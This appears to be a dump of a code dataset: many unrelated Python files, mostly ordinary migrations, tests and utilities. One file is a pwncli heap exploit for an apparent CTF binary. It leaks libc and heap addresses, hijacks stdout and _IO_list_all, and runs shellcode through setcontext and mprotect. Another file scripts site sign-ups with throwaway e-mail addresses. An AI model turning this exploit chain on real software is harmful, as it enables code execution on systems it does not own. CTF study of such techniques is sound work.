content stringlengths 5 1.05M |
|---|
# Generated by Django 2.0.9 on 2018-12-10 06:11
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
    """Add a Postgres JSONB ``metadata`` field to the Image and ImageSet models."""

    dependencies = [
        ('images', '0017_imageset_zip_state'),
    ]

    operations = [
        # default=dict (the callable, not {}) gives every row its own empty
        # dict instead of one shared mutable default.
        migrations.AddField(
            model_name='image',
            name='metadata',
            field=django.contrib.postgres.fields.jsonb.JSONField(default=dict),
        ),
        migrations.AddField(
            model_name='imageset',
            name='metadata',
            field=django.contrib.postgres.fields.jsonb.JSONField(default=dict),
        ),
    ]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: xiaoya li
# file: count_length_autotokenizer.py
import os
import sys
# Make the repository root importable when this file is run as a script:
# the root is two directory levels above this file.
repo_path = "/".join(os.path.realpath(__file__).split("/")[:-2])
print(repo_path)
if repo_path not in sys.path:
    sys.path.insert(0, repo_path)
from transformers import AutoTokenizer
from datasets.mrc_ner_dataset import MRCNERDataset
class OntoNotesDataConfig:
    """Data/tokenizer settings for the Chinese OntoNotes 4 MRC-NER dataset."""

    def __init__(self):
        self.data_dir = "/data/nfsdata2/xiaoya/mrc_ner/zh_onto4"
        self.model_path = "/data/xiaoya/pretrain_lm/chinese_L-12_H-768_A-12"
        self.do_lower_case = False
        # Slow (Python) tokenizer on purpose; Chinese characters are split
        # individually via tokenize_chinese_chars=True.
        self.tokenizer = AutoTokenizer.from_pretrained(self.model_path, use_fast=False, tokenize_chinese_chars=True)
        # BertWordPieceTokenizer(os.path.join(self.model_path, "vocab.txt"), lowercase=self.do_lower_case)
        self.max_length = 512
        self.is_chinese = True
        self.threshold = 275  # sequences longer than this are counted as "too long"
        self.data_sign = "zh_onto"
class ChineseMSRADataConfig:
    """Data/tokenizer settings for the Chinese MSRA MRC-NER dataset."""

    def __init__(self):
        self.data_dir = "/data/xiaoya/datasets/mrc_ner/zh_msra"
        self.model_path = "/data/xiaoya/pretrain_lm/chinese_L-12_H-768_A-12"
        self.do_lower_case = False
        self.tokenizer = AutoTokenizer.from_pretrained(self.model_path, use_fast=False, tokenize_chinese_chars=True)
        self.max_length = 512
        self.is_chinese = True
        self.threshold = 275  # sequences longer than this are counted as "too long"
        self.data_sign = "zh_msra"
class EnglishOntoDataConfig:
    """Data/tokenizer settings for the English OntoNotes 5 MRC-NER dataset."""

    def __init__(self):
        self.data_dir = "/data/xiaoya/datasets/mrc_ner/en_onto5"
        self.model_path = "/data/xiaoya/pretrain_lm/cased_L-12_H-768_A-12"
        self.do_lower_case = False
        self.tokenizer = AutoTokenizer.from_pretrained(self.model_path, use_fast=False)
        self.max_length = 512
        self.is_chinese = False
        self.threshold = 275  # sequences longer than this are counted as "too long"
        self.data_sign = "en_onto"
class EnglishCoNLLDataConfig:
    """Data/tokenizer settings for the English CoNLL-2003 MRC-NER dataset."""

    def __init__(self):
        self.data_dir = "/data/xiaoya/datasets/mrc_ner/en_conll03"
        self.model_path = "/data/xiaoya/pretrain_lm/cased_L-12_H-768_A-12"
        # Lowercase only when the checkpoint itself is an uncased model.
        if "uncased" in self.model_path:
            self.do_lower_case = True
        else:
            self.do_lower_case = False
        self.tokenizer = AutoTokenizer.from_pretrained(self.model_path, use_fast=False, do_lower_case=self.do_lower_case)
        self.max_length = 512
        self.is_chinese = False
        self.threshold = 275  # sequences longer than this are counted as "too long"
        self.data_sign = "en_conll03"
class EnglishCoNLL03DocDataConfig:
    """Settings for the document-level English CoNLL-2003 MRC-NER dataset."""

    def __init__(self):
        self.data_dir = "/data/xiaoya/datasets/mrc_ner/en_conll03_doc"
        self.model_path = "/data/xiaoya/pretrain_lm/cased_L-12_H-768_A-12"
        self.do_lower_case = False
        self.tokenizer = AutoTokenizer.from_pretrained(self.model_path, use_fast=False)
        self.max_length = 512
        self.is_chinese = False
        # Higher threshold than the sentence-level configs: inputs are documents.
        self.threshold = 384
        self.data_sign = "en_conll03"
def count_max_length(data_sign):
    """Scan a tokenized MRC-NER dataset and report token-length statistics.

    For each of the test/train/dev splits, prints the maximum number of
    tokens in any example and how many examples exceed the configured
    length threshold.

    Args:
        data_sign: dataset identifier; one of "zh_onto", "zh_msra",
            "en_onto", "en_conll03", "en_conll03_doc".

    Raises:
        ValueError: if ``data_sign`` is not a known dataset identifier.
    """
    # Dispatch table instead of the if/elif chain.
    config_classes = {
        "zh_onto": OntoNotesDataConfig,
        "zh_msra": ChineseMSRADataConfig,
        "en_onto": EnglishOntoDataConfig,
        "en_conll03": EnglishCoNLLDataConfig,
        "en_conll03_doc": EnglishCoNLL03DocDataConfig,
    }
    try:
        data_config = config_classes[data_sign]()
    except KeyError:
        # Name the bad value instead of raising a bare ValueError.
        raise ValueError(f"unknown data_sign: {data_sign!r}")

    for prefix in ["test", "train", "dev"]:
        print("=*" * 15)
        print(f"INFO -> loading {prefix} data. ")
        data_file_path = os.path.join(data_config.data_dir, f"mrc-ner.{prefix}")
        dataset = MRCNERDataset(json_path=data_file_path,
                                tokenizer=data_config.tokenizer,
                                max_length=data_config.max_length,
                                is_chinese=data_config.is_chinese,
                                pad_to_maxlen=False,
                                data_sign=data_config.data_sign)
        max_len = 0
        counter = 0
        for idx, data_item in enumerate(dataset):
            tokens = data_item[0]
            num_tokens = tokens.shape[0]
            max_len = max(max_len, num_tokens)
            if num_tokens > data_config.threshold:
                counter += 1
        # Was a literal "67,308" baked into the f-string -- report the value
        # actually computed for this split.
        print(f"INFO -> Max LEN for {prefix} set is : {max_len}")
        print(f"INFO -> larger than {data_config.threshold} is {counter}")
if __name__ == '__main__':
    # for english; switch the commented line below to run the Chinese set.
    data_sign = "en_onto"
    # data_sign = "zh_onto"
    count_max_length(data_sign)
|
import pytest
from pydantic import ValidationError
from kaiba.models.iterator import Iterator
def test_validates():  # noqa: WPS218
    """Test that dict is marshalled to pydantic object."""
    instance = Iterator(alias='test', path=['data'])

    assert instance.alias == 'test'
    assert instance.path == ['data']
def test_invalid():
    """Test that we get validation error with correct message."""
    with pytest.raises(ValidationError) as ve:
        Iterator(alias='test')

    first_error = ve.value.errors()[0]  # noqa: WPS441

    assert first_error['loc'] == ('path',)
    assert first_error['msg'] == 'field required'
def test_empty_path_is_error():
    """Test that giving an empty path is an error."""
    with pytest.raises(ValidationError) as ve:
        Iterator(alias='test', path=[])

    first_error = ve.value.errors()[0]  # noqa: WPS441

    assert first_error['loc'] == ('path',)
    assert 'has at least 1 items' in first_error['msg']
def test_only_int_and_str_in_path():
    """Test that non-str/int items in the path raise a validation error."""
    with pytest.raises(ValidationError) as ve:
        Iterator(alias='test', path=[12.2])
    errors = ve.value.errors()[0]  # noqa: WPS441
    assert errors['loc'] == ('path', 0)
    assert errors['msg'] == 'str type expected'
|
#!/usr/bin/env python
import sys
import pyautogui
def main():
    """Glide the mouse cursor to the center of the primary screen."""
    screen_w, screen_h = pyautogui.size()
    pyautogui.moveTo(screen_w / 2, screen_h / 2, 0.5, pyautogui.easeInQuad)


if __name__ == '__main__':
    sys.exit(main())
|
from peewee import SQL, CharField, IntegerField
from ...db import db
from ..fields import UIntForeignKeyField
class ProductCategory(db.Model):
    """Hierarchical product category; rows link to their parent category."""

    # Stored in the legacy "label" column.
    name = CharField(column_name="label", null=True)
    # Self-referential FK; NULL parent means a top-level category.
    parent = UIntForeignKeyField(
        column_name="parent_id",
        field="id",
        model="self",
        null=True,
        on_update="CASCADE",
    )
    # Sort order, defaulted to 0 at the database level.
    seq = IntegerField(constraints=[SQL("DEFAULT 0")])

    class Meta:
        table_name = "product_categories"
|
"""update reptiles, field type_inventaire values
Revision ID: e2d0f0d7bc9f
Revises: f4ed33963a7b
Create Date: 2018-03-30 11:49:23.021509
"""
# revision identifiers, used by Alembic.
revision = 'e2d0f0d7bc9f'
down_revision = 'f4ed33963a7b'
from alembic import op
import sqlalchemy as sa
from alembic import context
def upgrade():
    """Apply schema changes; run data changes too when '-x data=...' is set."""
    schema_upgrades()
    run_data = context.get_x_argument(as_dictionary=True).get('data')
    if run_data:
        data_upgrades()
def downgrade():
    """Revert data changes first (when '-x data=...' is set), then the schema."""
    run_data = context.get_x_argument(as_dictionary=True).get('data')
    if run_data:
        data_downgrades()
    schema_downgrades()
def schema_upgrades():
    """schema upgrade migrations go here (none for this revision)."""
    pass
def schema_downgrades():
    """schema downgrade migrations go here (none for this revision)."""
    pass
def data_upgrades():
    """Replace the choice list of the reptile 'type_inventaire' form field."""
    # Doubled single quotes inside the JSON array (d''écoute) are SQL escaping
    # for a literal apostrophe -- do not "fix" them.
    query = '''
    UPDATE public."ModuleForms"
    SET "Options"= '["Crapaudrome/crapauduc","Nasse/piège aquatique","Observation fortuite","Plaque à reptiles","Point d''écoute nocturne","Recherche à vue","Troubleau"]'
    WHERE "TypeObj" = 3 AND "Name" = 'type_inventaire';
    '''
    op.execute(query)
def data_downgrades():
    """Add any optional data downgrade migrations here (none: the previous
    option list is not restored)."""
    pass
|
"""
MIT License
Copyright (c) 2020 Andy Zhou
"""
from flask import Blueprint
user_bp = Blueprint("user", __name__)

# Imported after the blueprint exists so views can register routes on it
# (deliberate circular-import pattern).
from . import views  # noqa: E402,F401
|
import pandas as pd
import pytest
from pts.dataset import ProcessStartField
@pytest.mark.parametrize(
    "freq, expected",
    [
        ("B", "2019-11-01"),
        ("W", "2019-11-03"),
        ("M", "2019-11-30"),
        ("12M", "2019-11-30"),
        ("A-DEC", "2019-12-31"),
    ],
)
def test_process_start_field(freq, expected):
    """ProcessStartField.process should align the raw timestamp to the
    period implied by `freq` (e.g. "W" -> end of that week).
    """
    process = ProcessStartField.process
    given = "2019-11-01 12:34:56"
    # NOTE(review): the `freq` argument of pd.Timestamp is deprecated in
    # newer pandas -- confirm the pinned pandas version still supports it.
    assert process(given, freq) == pd.Timestamp(expected, freq)
|
import os
import pytest
from robocorp_ls_core.protocols import IConfigProvider
from robocorp_ls_core.robotframework_log import get_logger
from robocorp_ls_core.unittest_tools.cases_fixture import CasesFixture
from robocorp_code.protocols import IRcc
log = get_logger(__name__)
@pytest.fixture
def language_server_client_class():
    """Language-server client class (imported lazily to keep collection cheap)."""
    from robocorp_code_tests.robocode_language_server_client import (
        RobocorpLanguageServerClient,
    )

    return RobocorpLanguageServerClient
@pytest.fixture
def language_server_class():
    """Language-server implementation class (imported lazily)."""
    from robocorp_code.robocorp_language_server import RobocorpLanguageServer

    return RobocorpLanguageServer
@pytest.fixture
def main_module():
    """The robocorp_code __main__ module (entry point under test)."""
    from robocorp_code import __main__

    return __main__
@pytest.fixture
def rcc_location() -> str:
    """Path to the rcc executable, downloading it first if not yet present."""
    from robocorp_code.rcc import download_rcc
    from robocorp_code.rcc import get_default_rcc_location

    location = get_default_rcc_location()
    # force=False: reuse an already-downloaded executable across test runs.
    download_rcc(location, force=False)
    return location
@pytest.fixture
def ci_endpoint() -> str:
    """CI endpoint URL taken from the CI_ENDPOINT environment variable."""
    endpoint = os.environ.get("CI_ENDPOINT")
    if endpoint is None:
        raise AssertionError("CI_ENDPOINT env variable must be specified for tests.")
    return endpoint
@pytest.fixture
def ci_credentials() -> str:
    """CI credentials taken from the CI_CREDENTIALS environment variable."""
    ci_credentials = os.environ.get("CI_CREDENTIALS")
    if ci_credentials is None:
        # Name the actual env variable (CI_CREDENTIALS, uppercase), matching
        # the style of the ci_endpoint fixture's message.
        raise AssertionError("CI_CREDENTIALS env variable must be specified for tests.")
    return ci_credentials
@pytest.fixture
def rcc_config_location(tmpdir) -> str:
    """Path to a per-test rcc config file inside a fresh 'config' directory."""
    config_dir = tmpdir.join("config")
    os.makedirs(str(config_dir))
    # Only the path is returned; the file itself is not created here.
    return str(config_dir.join("config_test.yaml"))
@pytest.fixture(scope="session")
def cases(tmpdir_factory) -> CasesFixture:
    """Session-scoped copy of the _resources test cases in a temp directory.

    The non-ASCII basename is deliberate: it exercises unicode paths.
    """
    basename = "res áéíóú"
    copy_to = str(tmpdir_factory.mktemp(basename))

    f = __file__
    original_resources_dir = os.path.join(os.path.dirname(f), "_resources")
    assert os.path.exists(original_resources_dir)
    return CasesFixture(copy_to, original_resources_dir)
@pytest.fixture
def config_provider(
    ws_root_path: str, rcc_location: str, ci_endpoint: str, rcc_config_location: str
):
    """Configuration provider pre-filled with the test rcc settings."""
    from robocorp_code.robocorp_config import RobocorpConfig
    from robotframework_ls.ep_providers import DefaultConfigurationProvider

    config = RobocorpConfig()

    config.update(
        {
            "robocorp": {
                "rcc": {
                    "location": rcc_location,
                    "endpoint": ci_endpoint,
                    "config_location": rcc_config_location,
                }
            }
        }
    )
    return DefaultConfigurationProvider(config)
@pytest.fixture
def rcc(config_provider: IConfigProvider, rcc_location: str) -> IRcc:
    """Rcc wrapper built on top of the test configuration provider."""
    from robocorp_code.rcc import Rcc

    return Rcc(config_provider)
@pytest.fixture
def rcc_conda_installed(rcc: IRcc):
    """Ensure conda is installed through rcc before a test runs."""
    result = rcc.check_conda_installed()
    # Was r"Error: {result}" -- a raw (non-f) string, so the failure message
    # showed the literal placeholder instead of the result.
    assert result.success, f"Error: {result}"
|
"""This XBlock provides syntax highlighting via the PrismJS library"""
import pkg_resources
from web_fragments.fragment import Fragment
from xblock.core import XBlock
from xblock.fields import Scope, String, Integer
from xblockutils.resources import ResourceLoader
class PrismXBlock(XBlock):
    """
    Provide syntax highlighting within a code editor.

    Student view renders the code read-only through PrismJS; studio view
    embeds a CodeMirror editor and saves settings via `studio_submit`.
    """

    xblock_loader = ResourceLoader(__name__)

    # Shown as the component title in the LMS.
    display_name = String(
        help="The display name for this component",
        default="Syntax Highlighter",
        scope=Scope.settings
    )
    # The actual code shown/highlighted; per-course content.
    code_data = String(
        help="Code contents to display within editor",
        default="print('hello world')",
        scope=Scope.content
    )
    MAXHEIGHT_HELP = "Maximum height of code block (px)"
    maxheight = Integer(
        help=MAXHEIGHT_HELP,
        default=450,
        scope=Scope.settings
    )
    # 'value' must match a PrismJS language component name.
    LANGUAGE_CHOICES = [
        {'display_name': 'Bash', 'value': 'bash'},
        {'display_name': 'C-like', 'value': 'clike'},
        {'display_name': 'CSS', 'value': 'css'},
        {'display_name': 'Go', 'value': 'go'},
        {'display_name': 'Java', 'value': 'java'},
        {'display_name': 'Javascript', 'value': 'javascript'},
        {'display_name': 'JSON', 'value': 'json'},
        {'display_name': 'Lua', 'value': 'lua'},
        {'display_name': 'Markup', 'value': 'markup'},
        {'display_name': 'Python', 'value': 'python'},
        {'display_name': 'Ruby', 'value': 'ruby'},
        {'display_name': 'Shell-Session', 'value': 'shell-session'},
        {'display_name': 'SQL', 'value': 'sql'},
        {'display_name': 'YAML', 'value': 'yaml'},
    ]
    LANGUAGE_HELP = "Select a programming language"
    language = String(
        help=LANGUAGE_HELP,
        default='python',
        values=LANGUAGE_CHOICES,
        scope=Scope.settings
    )
    # 'value' must match a static/css/<value>.css stylesheet.
    THEME_CHOICES = [
        {'display_name': 'Light', 'value': 'light'},
        {'display_name': 'Dark', 'value': 'dark'},
    ]
    THEME_HELP = "Select a syntax highlighting theme"
    theme = String(
        help= THEME_HELP,
        default="dark",
        values=THEME_CHOICES,
        scope=Scope.settings
    )

    def resource_string(self, path):
        """Handy helper for getting resources from our kit."""
        data = pkg_resources.resource_string(__name__, path)
        return data.decode("utf8")

    def student_view(self, context=None):
        """
        Return a fragment that contains the editor with code for student view.
        """
        frag = Fragment()
        frag.add_content(self.xblock_loader.render_django_template(
            'static/html/lms.html',
            context={'self':self}
        ))
        # Theme stylesheet is chosen at render time from the saved setting.
        css_path = "static/css/{}.css".format(self.theme)
        frag.add_css(self.resource_string(css_path))
        frag.add_css(self.resource_string("static/css/prism.css"))
        frag.add_javascript(self.resource_string("static/js/src/prism.js"))
        frag.initialize_js('RunPrism')
        return frag

    def studio_view(self, context=None):
        """
        Return a fragment that contains the editor with code for studio view.
        """
        frag = Fragment()
        frag.add_content(self.xblock_loader.render_django_template(
            'static/html/studio.html',
            context={'self':self}
        ))
        css_path = "static/css/{}.css".format(self.theme)
        frag.add_css(self.resource_string("static/codemirror/codemirror.css"))
        frag.add_css(self.resource_string(css_path))
        frag.add_javascript(self.resource_string("static/js/src/studio.js"))
        frag.add_javascript(self.resource_string("static/codemirror/codemirror.js"))
        frag.add_javascript(self.resource_string("static/js/src/prism.js"))
        frag.initialize_js('PrismXBlock')
        return frag

    @XBlock.json_handler
    def studio_submit(self, data, suffix=''):
        """
        Update saved code input with new code input.

        NOTE(review): missing keys in `data` would overwrite fields with
        None -- confirm the studio form always submits all five keys.
        """
        self.display_name = data.get('display_name')
        self.code_data = data.get('code_data')
        self.language = data.get('language')
        self.theme = data.get('theme')
        self.maxheight = data.get('maxheight')
        return {'result': 'success'}

    # TO-DO: change this to create the scenarios you'd like to see in the
    # workbench while developing your XBlock.
    @staticmethod
    def workbench_scenarios():
        """A canned scenario for display in the workbench."""
        return [
            ("PrismXBlock",
             """<prism/>
             """),
            ("Multiple PrismXBlock",
             """<vertical_demo>
                <prism/>
                <prism/>
                <prism/>
                </vertical_demo>
             """),
        ]
|
from scipy.stats import expon
from numpy import exp, ceil
from scipy.optimize import root_scalar
class ExponMixture:
    """Finite mixture of exponential distributions.

    Args:
        ps: mixture weights of the components (expected to sum to 1).
        scales: scale parameter (mean) of each exponential component.
    """

    def __init__(self, ps, scales):
        self.ps = ps
        self.scales = scales
        # Pre-build one frozen scipy distribution per component.
        self.expons = [expon(scale=scale) for scale in scales]

    def pdf(self, x):
        """Mixture probability density at x."""
        return sum(p * rv.pdf(x) for p, rv in zip(self.ps, self.expons))

    def cdf(self, x):
        """Mixture cumulative distribution function at x."""
        return sum(p * rv.cdf(x) for p, rv in zip(self.ps, self.expons))

    def sf(self, x):
        """Survival function P(X > x)."""
        return 1.0 - self.cdf(x)

    def partial_exp(self, x):
        """Partial expectation: integral of t*pdf(t) over [0, x]."""
        result = 0.0
        for p, a in zip(self.ps, self.scales):
            # Closed form of the integral for a single exponential component.
            result -= p * ((x + a) * exp(-x / a) - a)
        return result

    def find_restart_time(self, n=0.0):
        """Solve for the restart time via a secant search on __condition.

        Args:
            n: offset parameter; the search target is shifted by b = 1.5*n.

        Returns:
            The root (plus b), rounded up to the next integer.
        """
        b = 1.5 * n
        # BUGFIX: args must be a tuple. `args=(b)` is just the scalar b, which
        # breaks the solver's internal f(x, *args) call -- use (b,).
        solution = root_scalar(self.__condition, args=(b,), x0=10.0 * (b + 1.0), x1=b, method='secant', xtol=1.0)
        return ceil(solution.root + b)

    def __condition(self, t, b):
        """Root function whose zero defines the restart time (shifted by b)."""
        F = self.cdf(t)
        result = (F - 1.0) * t
        result += F * (1 - F) / (self.pdf(t))
        result -= self.partial_exp(t)
        return result - b
"""Module contains API to operate details route view model."""
from typing import Optional
from pyramid.request import Request
from billtracker.data import repository
from billtracker.data.models.bill import Bill
from billtracker.data.models.users import User
from billtracker.models.base import ViewModel
class BillDetailsViewModel(ViewModel):
    """Represent details view model route.

    Loads the bill and user referenced by the request and validates that the
    posted payment amount is acceptable.
    """

    def __init__(self, request: Request, user_id: int) -> None:
        super().__init__(request)
        # -1 is the sentinel for "no bill_id in the URL".
        self.bill_id: int = int(request.matchdict.get("bill_id", -1))
        self.bill: Optional[Bill] = repository.bill_by_id(self.bill_id)
        self.user_id: int = user_id
        self.user: Optional[User] = repository.user_by_id(user_id)
        self.amount: Optional[int] = None
        self.__validate_ids()

    def validate(self) -> None:
        """Validation from form template."""
        try:
            self.amount = self.__amount
            if self.amount < 0 or self.amount > self.bill.total - self.bill.paid:  # type: ignore
                # Fixed grammar of the user-facing message ("more the zero").
                self.error = "Your amount must be more than zero and less than what you owe."
        except ValueError:
            self.error = "Amount must be an integer."

    @property
    def __amount(self) -> int:
        """Returns bill amount from the POSTed form (-1 when missing)."""
        return int(self.request.POST.get("amount", -1))

    def __validate_ids(self) -> None:
        """Validates model IDs: user exists, bill exists, and bill belongs to user."""
        if not self.user:
            self.error = f"No user with ID {self.user_id}"
        elif not self.bill:
            self.error = f"The bill with ID {self.bill_id} was not found"
        elif self.user.id != self.bill.user_id:
            self.error = "The bill does not belong to user"
            self.bill = None
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: Olivier Noguès
import ares.Lib.AresSql
class AresPostGres(ares.Lib.AresSql.AresSqlConn):
  """
  :category: Connector
  :rubric: PY
  :type: Class
  :dsc:
    Connector to PostgreSQL databases. This connector will allow you to create, store and retrieve data from any PostgreSQL database.
    This will return the AReS database object. It will be possible to reuse the same syntax to then interact with it.
    **The forceCreate function only works for sqlite**, create your database before starting adding the tables and data

    ## PostGreSql Database

    If you want to test your set up locally with a PostGres locally you can install one locally [Here](https://www.enterprisedb.com/thank-you-downloading-postgresql?anid=1255962)
    Once the installation is done you will only have to get the localhost url of your database server

    ```python
    db = aresObj.db(dbFamily="postgresql", database="youpi", host="127.0.0.1", port="5433", username='postgres', password="240985") #database=r"newTestSuper.db")
    df = aresObj.file(htmlCode=r"IBRD_Balance_Sheet__FY2010.csv").read()
    modelFilePath = df.saveTo(fileFamily="model", dbName='Youpi2')
    ```
  """
  # Family key used by aresObj.db() to select this connector.
  dbFamily = 'postgresql'
  # External driver required by this connector (import name, pip name).
  _extPackages = [("psycopg2", 'psycopg2')]
|
from configparser import ConfigParser
from emails.EmailSnailPro import EmailSnailPro
from sites.AgentJbzd import AgentJbzd
from utils import BrowserManager
from utils import Logger
if __name__ == '__main__' and __package__ is None:
    # NOTE(review): the `__package__ is None` guard means this only runs when
    # executed as a plain script, not via `-m` -- confirm that's intended.
    Logger.setup_logger()

    # Read config.ini for the e-mail provider and target-site URLs.
    config = ConfigParser()
    config.read('config.ini')
    email_provider_url = config['GENERAL']['EmailProvider']
    target_site_url = config['GENERAL']['TargetSite']

    driver = BrowserManager.init_driver()
    # Obtain a throwaway address, then register on the target site with it.
    email_agent = EmailSnailPro(driver, email_provider_url)
    temp_email = email_agent.get_temp_email()
    site_agent = AgentJbzd(driver, target_site_url)
    site_agent.register_account(temp_email)
|
#!/usr/bin/python3
from pwncli import *
cli_script()
p:tube = gift['io']
elf:ELF = gift['elf']
libc: ELF = gift['libc']
def add(size:int):
    """Menu option 1: allocate a chunk of `size` bytes."""
    p.sendlineafter("Choice: \n", "1")
    p.sendlineafter("Size: ", str(size))
def edit(idx:int, data:(str, bytes)):
    """Menu option 2: write `data` into the chunk at `idx` (no newline appended)."""
    p.sendlineafter("Choice: \n", "2")
    p.sendlineafter("Index: ", str(idx))
    p.sendafter("Content: ", data)
def delete(idx:int):
    """Menu option 3: free the chunk at `idx`."""
    p.sendlineafter("Choice: \n", "3")
    p.sendlineafter("Index: ", str(idx))
def show(idx:int):
    """Menu option 4: print the chunk at `idx`; returns one line of its output."""
    p.sendlineafter("Choice: \n", "4")
    p.sendlineafter("Index: ", str(idx))
    return p.recvline()
# ---- Exploit flow (strictly order-sensitive; offsets target one specific
# libc build) ----

# Heap grooming: four chunks of different size classes.
add(0x80) # 0
add(0x68) # 1
add(0xf0) # 2
add(0x800) # 3
delete(0)
# Overflow out of chunk 1 to forge a 0x100 size field on the neighbour.
edit(1, flat(["a" * 0x60, 0x100]))
delete(2)
add(0x80)
# Chunk 1 now overlaps freed memory: read it to leak an arena pointer.
msg = show(1)
# 0x3c4b78: libc-specific offset of the leaked main_arena pointer.
libc_base_addr = u64(msg[:-1].ljust(8, b"\x00")) - 0x3c4b78
libc.address = libc_base_addr
log_address("libc_base_addr", libc_base_addr)
stop()
delete(0)
add(0xf0)
add(0xf0)
delete(0)
add(0x80)
# Corrupt a freed chunk's forward pointer (fastbin-style attack);
# 0x3c67f8 - 0x10 is a libc-specific target address.
edit(1, flat([0, libc_base_addr + 0x3c67f8 - 0x10]))
add(0x60)
delete(1)
# Redirect the freelist to just before _IO_2_1_stdout_ (-0x43 lands on a
# byte that serves as a plausible fake chunk size).
edit(4, p64(libc.sym["_IO_2_1_stdout_"] - 0x43))
add(0x60)
add(0x68) # 5
# Overwrite stdout's flags and buffer pointers so the next flush leaks the
# 8 bytes around __curbrk (0xfbad1887 = magic + output flags).
edit(5, flat("\x00" * 0x33, 0xfbad1887, 0, 0, 0, libc.sym['__curbrk'] - 8, libc.sym['__curbrk'] + 8))
msg = p.recvn(16)
# 0x21000: observed distance between the program break and the heap base.
heap_base_addr = u64(msg[8:]) - 0x21000
log_address("heap_base_addr", heap_base_addr)
stop()
delete(1)
# Second freelist attack, this time at _IO_list_all, to install a fake
# FILE object located at heap_base + 0x210.
edit(4, p64(libc.sym["_IO_list_all"] - 0x23))
add(0x60)
add(0x60)
edit(6, flat(["\x00" * 0x13, heap_base_addr+0x210]))
delete(3)
add(0x800) # 3
stop()
# Fake FILE payload: setcontext+0x35 pivots execution, mprotect makes the
# heap RWX (0x68/0x70/0x88 = addr/len/prot args), then control jumps to the
# shellcode at +0x180 which cats /flag.
payload = flat({
    0x18:libc.sym['setcontext']+0x35,
    0x28:1,
    0xd8:heap_base_addr+0x210,
    0xa0:heap_base_addr+0x210+0x100,
    0xa8:libc.sym['mprotect'],
    0x100: heap_base_addr+0x180+0x210,
    0x68: heap_base_addr,
    0x70: 0x3000,
    0x88: 7,
    0x180:asm(shellcraft.cat("/flag"))
}, filler="\x00")
edit(3, payload)
stop()
# Menu option 5: exit / trigger the FILE cleanup path.
p.sendlineafter("Choice: \n", "5")
p.interactive()
"""Test cases for dual bytes/str APIs"""
import unittest
"""
The Python 2 str type conveniently permitted the creation of APIs that
could be used as either binary APIs (8-bit str in, 8-bit str out) or as
text APIs (unicode in, unicode out).
The critical enabler for this feature was the ability to define any
*constants* used in these algorithms as 8 bit strings, and then rely on
the implicit promotion to Unicode to handle text input.
In Python 3, that implicit conversion to Unicode is gone, so APIs that
handle both binary and text data need to be written to either have two
separate code paths, or else to automatically decode binary input to text
and then convert it back to binary output again when returning the result.
However, it should be possible to create a Python 3 extension type that
inherits from str (providing interoperability with str objects) and *also*
implements the buffer API (providing interoperability with bytes and
bytearray, and likely other types).
This is a test suite developed on Python 2, demonstrating the convenience
of the implicit conversion in the case of such dual binary/text interfaces.
While the general recommendation for Python 3 code is to ensure APIs are
either binary *or* text rather than a hybrid combination, libraries
migrating from Python 2 that already publish such hybrid APIs may need to
continue to support both styles of usage for the benefit of clients (as
some clients may be using the binary half of the interface, while others
are using the text half).
The URL parsing APIs in Python 3's urllib.parse module are an example of
such an API. It supported both str and unicode in Python 2 and supports
both str and any type with a decode method in Python 3"""
# Import the C-accelerated hybrid str type when available.
try:
    from asciicompat import asciistr
except ImportError:
    # Python 2 fallback
    asciistr = str

# Developing the tests on Python 2: `unicode` only exists there.
try:
    text_type = unicode
except NameError:  # was a bare except; only NameError can occur here
    text_type = str
binary_type = bytes
# NOTE(review): this unconditionally overrides the asciicompat import above,
# so the imported asciistr is never used -- looks like leftover dev scaffolding.
asciistr = str

# Some test values
TEXT = u"text"
BINARY = b"binary"
HYBRID = asciistr("ascii")
class TestHybridAddition(unittest.TestCase):
    """Concatenating the hybrid type with text or bytes yields the other type."""

    def test_text_addition(self):
        # Hybrid + text promotes to the text type on either side.
        self.assertEqual(TEXT + HYBRID, u"textascii")
        self.assertIsInstance(TEXT + HYBRID, text_type)
        self.assertEqual(HYBRID + TEXT, u"asciitext")
        self.assertIsInstance(HYBRID + TEXT, text_type)

    def test_binary_addition(self):
        self.assertEqual(BINARY + HYBRID, b"binaryascii")
        self.assertIsInstance(BINARY + HYBRID, binary_type)
        # Next two are likely to be affected by
        # http://bugs.python.org/issue11477
        # as the str subclass on the LHS will throw TypeError directly
        # as returning NotImplemented from sq_concat is not currently
        # supported correctly
        self.assertEqual(HYBRID + BINARY, b"asciibinary")
        self.assertIsInstance(HYBRID + BINARY, binary_type)
class HybridTestMixin(object):
    """Shared assertions for hybrid constants against one input type.

    Subclasses set ``input_data`` (a bytes or text value containing the word
    "data") and ``output_type`` (the type results should have).
    """

    input_data = None
    output_type = None
    exists = asciistr("data")
    missing = asciistr("not data")

    def test_containment(self):
        self.assertIn(self.exists, self.input_data)
        self.assertIn(self.exists[:2], self.input_data)
        self.assertNotIn(self.missing, self.input_data)

    def test_partitioning(self):
        # Partitioning on a hybrid separator keeps the input's type.
        before, sep, after = self.input_data.partition(self.exists)
        self.assertIsInstance(before, self.output_type)
        self.assertIsInstance(sep, self.output_type)
        self.assertIsInstance(after, self.output_type)
        self.assertEqual(sep, self.exists)

    def test_casting(self):
        self.assertEqual(self.output_type(self.exists), self.exists)
        self.assertIs(type(self.output_type(self.exists)), self.output_type)

    # Formatting tests: in Python 2, str formatting always produces
    # str objects, *except* when a Unicode object is passed to mod-formatting
    def test_mod_formatting(self):
        formatted = asciistr("%s") % self.input_data
        self.assertEqual(formatted, self.input_data)
        self.assertIs(type(formatted), self.output_type)
        formatted_int = asciistr("%d") % 42
        # asciistr also avoids the byte constructor length init quirk
        self.assertEqual(formatted_int, asciistr(42))
        self.assertIs(type(formatted_int), binary_type)

    def test_format_method(self):
        formatted = asciistr("{}").format(self.input_data)
        self.assertEqual(formatted, self.input_data)
        # str.format always yields the binary type here (unlike mod-format).
        self.assertIs(type(formatted), binary_type)
        formatted_int = asciistr("{:d}").format(42)
        # asciistr also avoids the byte constructor length init quirk
        self.assertEqual(formatted_int, asciistr(42))
        self.assertIs(type(formatted_int), binary_type)
class TestBinaryInteraction(unittest.TestCase, HybridTestMixin):
    """Run the mixin assertions against bytes input."""

    input_data = b"there is binary data in this test case"
    output_type = binary_type
class TestTextInteraction(unittest.TestCase, HybridTestMixin):
    """Run the mixin assertions against text input."""

    input_data = u"there is text data in this test case"
    output_type = text_type
if __name__ == "__main__":
    # Standard unittest entry point.
    unittest.main()
|
from functools import partial
from pathlib import Path
from typing import List
import numpy as np
